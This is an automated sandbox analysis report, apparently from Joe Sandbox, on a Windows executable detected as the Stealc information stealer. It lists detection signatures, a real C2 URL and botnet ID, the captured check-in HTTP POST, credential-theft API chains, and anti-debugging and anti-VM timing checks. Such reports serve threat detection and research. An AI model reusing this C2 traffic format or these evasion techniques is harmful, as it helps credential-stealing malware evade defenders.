
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1531601
MD5: adde8b6ddcd55de3dde9f4ee627cc469
SHA1: 880f68fbfe3320a5aa1114ce977b7ea532d1be11
SHA256: 069c5ce1632725647ebe8ee55088da4f22f79f8d8922a72f70c35a87bbbc9764
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ADDE8B6DDCD55DE3DDE9F4EE627CC469)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (extracted from 0.2.file.exe.860000.0.unpack): {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author)
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3448 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3448 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.860000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-10-11T12:44:04.440396+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.860000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat (0_2_0086C820)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00869AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree (0_2_00869AC0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00867240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree (0_2_00867240)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00869B60 CryptUnprotectData,LocalAlloc,LocalFree (0_2_00869B60)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00878EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA (0_2_00878EA0)
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose (0_2_008738B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00874910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_00874910)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose (0_2_0086DA80)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA (0_2_0086E430)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose (0_2_0086ED20)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00874570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen (0_2_00874570)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086F68A FindFirstFileA (0_2_0086F68A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00873EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose (0_2_00873EA0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_0086F6B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_008616D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_0086DE10)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose (0_2_0086BE70)

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 38 38 36 33 33 37 44 33 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a
    Data Ascii:
    ------HCFCAAEBGCAKKFIDBKJJ
    Content-Disposition: form-data; name="hwid"

    D9886337D30C3886582548
    ------HCFCAAEBGCAKKFIDBKJJ
    Content-Disposition: form-data; name="build"

    doma
    ------HCFCAAEBGCAKKFIDBKJJ--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00864880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle (0_2_00864880)
Source: file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/5
Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpI
Source: file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37I

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2E06E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B69861
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCA9B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A98F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C29193
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5C93D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEC90F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1F27D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2FBF6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B22BEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CCF3B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C34B12
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3B401
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C27412
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C316C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B75ED6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BBCE5B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC9727
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D25775
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 008645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: tggnfgne ZLIB complexity 0.9947980416156671
Source: file.exe, 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00878680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle (0_2_00878680)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00873720 CoCreateInstance,MultiByteToWideChar,lstrcpyn (0_2_00873720)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\B288Z01C.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1829376 > 1048576
Source: file.exe | Static PE information: Raw size of tggnfgne is bigger than: 0x100000 < 0x198800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tggnfgne:EW;tktydact:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tggnfgne:EW;tktydact:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_00879860)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c4e60 should be: 0x1bf963
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: tggnfgne
Source: file.exe | Static PE information: section name: tktydact
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C798C1 push ecx; mov dword ptr [esp], esi (0_2_00C798DA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC10C0 push 5DBEC2C0h; mov dword ptr [esp], eax (0_2_00CC1114)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4C0D6 push esi; mov dword ptr [esp], 5B88E23Eh (0_2_00C4C62D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB20D2 push ecx; mov dword ptr [esp], esp (0_2_00CB211A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5B0E4 push 284E6957h; mov dword ptr [esp], ebx (0_2_00C5B113)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5B0E4 push eax; mov dword ptr [esp], edx (0_2_00C5B137)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D120F7 push edi; mov dword ptr [esp], ebp (0_2_00D12115)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E0 push edx; mov dword ptr [esp], eax (0_2_00CE5928)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E0 push eax; mov dword ptr [esp], edx (0_2_00CE5938)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE189D push ecx; mov dword ptr [esp], eax (0_2_00CE18F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE189D push eax; mov dword ptr [esp], ebx (0_2_00CE18F5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1D8BF push edx; mov dword ptr [esp], edi (0_2_00D1DE76)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push ecx; mov dword ptr [esp], eax (0_2_00B9915F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push 1B96A761h; mov dword ptr [esp], eax (0_2_00B99171)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push eax; mov dword ptr [esp], edx (0_2_00B99180)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push 0F2155B2h; mov dword ptr [esp], ecx (0_2_00B991A1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push eax; mov dword ptr [esp], esi (0_2_00B991E5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push 1DED5138h; mov dword ptr [esp], ebp (0_2_00B99219)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B990D6 push 731F1E5Ah; mov dword ptr [esp], eax (0_2_00B992DB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push ecx; mov dword ptr [esp], ebp (0_2_00C380D1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push 58376BF9h; mov dword ptr [esp], eax (0_2_00C380D9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push ebx; mov dword ptr [esp], 37EECD3Eh (0_2_00C380E2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push esi; mov dword ptr [esp], ebp (0_2_00C381EE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push 03B9F842h; mov dword ptr [esp], eax (0_2_00C3828F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push 2062E7B2h; mov dword ptr [esp], edi (0_2_00C38315)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push edx; mov dword ptr [esp], eax (0_2_00C383D6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push ecx; mov dword ptr [esp], eax (0_2_00C3842C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push ecx; mov dword ptr [esp], 7FFBDCEAh (0_2_00C38486)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push 4DD7416Ch; mov dword ptr [esp], esp (0_2_00C38494)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push 5B14CB31h; mov dword ptr [esp], esp (0_2_00C38600)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C380B8 push ebx; mov dword ptr [esp], 75ECB9B5h (0_2_00C38612)
Source: file.exe | Static PE information: section name: tggnfgne entropy: 7.953565165226687

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_00879860)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13660)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC1EFF second address: AC1F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32CAA second address: C32CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F19E second address: C3F1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F885D5FB128h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F1B3 second address: C3F1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F1B9 second address: C3F1BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F1BF second address: C3F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F885C786DECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F5F0 second address: C3F5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F88E second address: C3F892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F892 second address: C3F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jns 00007F885D5FB126h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F8A2 second address: C3F8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885C786DF6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42C87 second address: C42C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42C8B second address: C42C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42C91 second address: C42CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885D5FB12Bh 0x00000008 jmp 00007F885D5FB12Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F885D5FB13Fh 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F885D5FB135h 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push edx 0x00000025 je 00007F885D5FB128h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e mov eax, dword ptr [eax] 0x00000030 jmp 00007F885D5FB12Bh 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jnl 00007F885D5FB126h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42CF6 second address: AC1EFF instructions: 0x00000000 rdtsc 0x00000002 js 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edi 0x0000000e push dword ptr [ebp+122D0251h] 0x00000014 mov dword ptr [ebp+122D1F41h], ebx 0x0000001a call dword ptr [ebp+122D1CD2h] 0x00000020 pushad 0x00000021 jmp 00007F885C786DF6h 0x00000026 xor eax, eax 0x00000028 mov dword ptr [ebp+122D1CF6h], edx 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 jmp 00007F885C786DEEh 0x00000037 cmc 0x00000038 mov dword ptr [ebp+122D2AC4h], eax 0x0000003e js 00007F885C786DE7h 0x00000044 cld 0x00000045 mov esi, 0000003Ch 0x0000004a cmc 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f jmp 00007F885C786DEBh 0x00000054 lodsw 0x00000056 mov dword ptr [ebp+122D1CF6h], ebx 0x0000005c add eax, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D1CF6h], ebx 0x00000066 jmp 00007F885C786DF8h 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f jmp 00007F885C786DECh 0x00000074 nop 0x00000075 jp 00007F885C786DEEh 0x0000007b push edi 0x0000007c jnc 00007F885C786DE6h 0x00000082 pop edi 0x00000083 push eax 0x00000084 pushad 0x00000085 jno 00007F885C786DECh 0x0000008b push eax 0x0000008c push edx 0x0000008d pushad 0x0000008e popad 0x0000008f rdtsc
